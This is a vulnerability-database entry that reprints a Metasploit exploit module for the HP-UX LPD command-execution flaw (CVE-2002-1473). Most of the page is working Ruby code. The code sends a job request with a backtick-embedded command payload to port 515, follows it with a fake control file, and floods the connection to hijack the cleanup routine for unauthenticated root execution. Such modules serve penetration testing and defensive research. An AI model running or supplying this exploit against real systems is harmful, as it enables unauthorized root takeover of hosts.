Lucene search
K

HP-UX LPD 10.20, 11.00, 11.11 - Command Execution

🗓️ 01 Jul 2014 00:00:00Reported by KnownsecType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

HP-UX LPD Command Execution This exploit abuses an unpublished vulnerability in the HP-UX LPD service. The flaw allows an unauthenticated attacker to execute arbitrary commands with root user privileges. The vulnerability was silently patched with buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213

Code

                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP-UX LPD Command Execution',
			'Description'    => %q{
				This exploit abuses an unpublished vulnerability in the
				HP-UX LPD service. This flaw allows an unauthenticated
				attacker to execute arbitrary commands with the privileges
				of the root user. The LPD service is only exploitable when
				the address of the attacking system can be resolved by the
				target. This vulnerability was silently patched with the
				buffer overflow flaws addressed in HP Security Bulletin
				HPSBUX0208-213.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-1473'],
					[ 'OSVDB', '9638'],
					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

				],
			'Platform'       => ['unix', 'hpux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 200,
					'DisableNops' => true,
					'BadChars'    => "\x00\x09\x20\x2f",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},			
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# The job ID is squashed down to three decimal digits
		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# Connect to the LPD service
		connect
		
		print_status("Sending our job request with embedded command string...")
		# Send the job request with the encoded command
		sock.put(
			"\x02" + rand_text_alphanumeric(3) + jid +
			"`" + payload.encoded + "`\n"
		)
		
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our job request")
			return
		end

		print_status("Sending our fake control file...")		
		sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our control file")
			return
		end
		
		print_status("Forcing an error and hijacking the cleanup routine...")
		
		begin
			sock.put(rand_text_alphanumeric(16384))
			disconnect
		rescue
		end
		
	end

end

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation